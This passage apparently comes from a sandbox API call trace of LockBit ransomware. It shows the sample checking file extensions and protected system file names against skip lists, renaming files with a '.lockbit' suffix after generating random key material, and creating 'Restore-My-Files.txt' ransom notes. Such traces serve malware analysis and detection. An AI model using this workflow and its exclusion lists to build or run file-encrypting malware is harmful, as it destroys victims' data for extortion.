lpString2=".WMF") returned -1 [0167.353] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.353] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.353] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.353] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.353] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.353] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.353] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.353] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.353] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.353] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.354] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.354] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.354] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.354] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.354] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.354] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.354] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.354] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.354] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.354] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.354] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.354] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.354] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.354] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.354] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.354] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.354] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.354] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.354] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.354] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE01661_.WMF") returned 1 [0167.354] lstrcmpiW (lpString1="ntldr", lpString2="PE01661_.WMF") returned -1 [0167.354] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE01661_.WMF") returned -1 [0167.355] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE01661_.WMF") returned -1 [0167.355] lstrcmpiW (lpString1="autorun.inf", lpString2="PE01661_.WMF") returned -1 [0167.355] lstrcmpiW (lpString1="thumbs.db", lpString2="PE01661_.WMF") returned 1 [0167.355] lstrcmpiW (lpString1="iconcache.db", lpString2="PE01661_.WMF") returned -1 [0167.355] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.355] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01661_.WMF") returned=".WMF" [0167.355] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.355] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.355] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.355] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.355] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.355] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.355] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.355] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.355] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.355] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.355] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.355] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.355] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.355] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.355] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.355] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.356] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.356] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.356] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.356] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.356] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.356] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.356] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.356] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.356] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.356] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.356] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.356] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.356] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01661_.WMF.lockbit") returned 72 [0167.356] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01661_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe01661_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0167.357] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.357] malloc (_Size=0x40068) returned 0x3df0008 [0167.357] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5144) returned 1 [0167.357] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.358] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.358] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.358] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.359] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.363] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01661_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01661_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.363] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.363] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.365] free (_Block=0x1fa2ed8) [0167.365] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01661_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.365] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.365] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.365] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x59cb4f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xdda, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE01797_.WMF", cAlternateFileName="")) returned 1 [0167.365] lstrcmpiW (lpString1=".", lpString2="PE01797_.WMF") returned -1 [0167.365] lstrcmpiW (lpString1="..", lpString2="PE01797_.WMF") returned -1 [0167.365] PathFindExtensionW (pszPath="PE01797_.WMF") returned=".WMF" [0167.365] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.365] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.365] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.365] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.365] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.365] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.365] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.365] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.365] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.366] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.366] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.366] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.366] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.366] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.366] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.366] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.366] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.366] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.366] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.366] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.366] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.366] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.366] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.366] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.366] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.366] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.366] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.366] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.366] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.366] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.367] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.367] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.367] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.367] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.367] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.367] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.367] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.367] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.367] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.367] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.367] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.367] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.367] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.367] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.367] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.367] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.367] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.367] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE01797_.WMF") returned 1 [0167.367] lstrcmpiW (lpString1="ntldr", lpString2="PE01797_.WMF") returned -1 [0167.367] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE01797_.WMF") returned -1 [0167.368] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE01797_.WMF") returned -1 [0167.368] lstrcmpiW (lpString1="autorun.inf", lpString2="PE01797_.WMF") returned -1 [0167.368] lstrcmpiW (lpString1="thumbs.db", lpString2="PE01797_.WMF") returned 1 [0167.368] lstrcmpiW (lpString1="iconcache.db", lpString2="PE01797_.WMF") returned -1 [0167.368] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.368] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01797_.WMF") returned=".WMF" [0167.368] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.368] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.368] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.368] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.368] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.368] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.368] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.368] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.368] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.368] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.368] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.368] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.368] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.368] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.369] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.369] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.369] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.369] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.369] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.369] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.369] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.369] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.369] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.369] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.369] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.369] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.369] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.369] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.369] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01797_.WMF.lockbit") returned 72 [0167.369] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01797_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe01797_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0167.370] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.370] malloc (_Size=0x40068) returned 0x3f70048 [0167.371] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=3546) returned 1 [0167.371] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.371] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.371] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0167.371] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.372] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.372] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0167.372] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0167.377] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01797_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01797_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.377] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.377] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.378] free (_Block=0x1fa2ed8) [0167.378] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE01797_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.379] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.379] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.379] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x59cb4f50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x23d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE02120_.WMF", cAlternateFileName="")) returned 1 [0167.379] lstrcmpiW (lpString1=".", lpString2="PE02120_.WMF") returned -1 [0167.379] lstrcmpiW (lpString1="..", lpString2="PE02120_.WMF") returned -1 [0167.379] PathFindExtensionW (pszPath="PE02120_.WMF") returned=".WMF" [0167.379] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.379] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.379] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.379] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.379] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.379] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.379] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.379] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.379] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.379] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.379] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.379] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.379] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.379] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.379] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.379] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.379] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.380] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.380] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.381] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.381] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.381] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.381] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.381] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE02120_.WMF") returned 1 [0167.381] lstrcmpiW (lpString1="ntldr", lpString2="PE02120_.WMF") returned -1 [0167.381] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE02120_.WMF") returned -1 [0167.381] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE02120_.WMF") returned -1 [0167.381] lstrcmpiW (lpString1="autorun.inf", lpString2="PE02120_.WMF") returned -1 [0167.381] lstrcmpiW (lpString1="thumbs.db", lpString2="PE02120_.WMF") returned 1 [0167.381] lstrcmpiW (lpString1="iconcache.db", lpString2="PE02120_.WMF") returned -1 [0167.381] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.381] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02120_.WMF") returned=".WMF" [0167.381] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.381] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.381] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.381] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.381] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.381] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.381] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.381] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.381] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.381] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.381] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.381] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.382] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.382] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.382] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.382] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.382] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.382] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.382] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.382] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.382] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.382] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.382] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.382] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.382] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.382] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.382] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.382] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.382] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02120_.WMF.lockbit") returned 72 [0167.382] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE02120_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe02120_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0167.383] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.383] malloc (_Size=0x40068) returned 0x1ff1e60 [0167.383] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=9172) returned 1 [0167.383] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.384] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.384] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0167.384] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.384] GetProcAddress (hModule=0x753f0000, 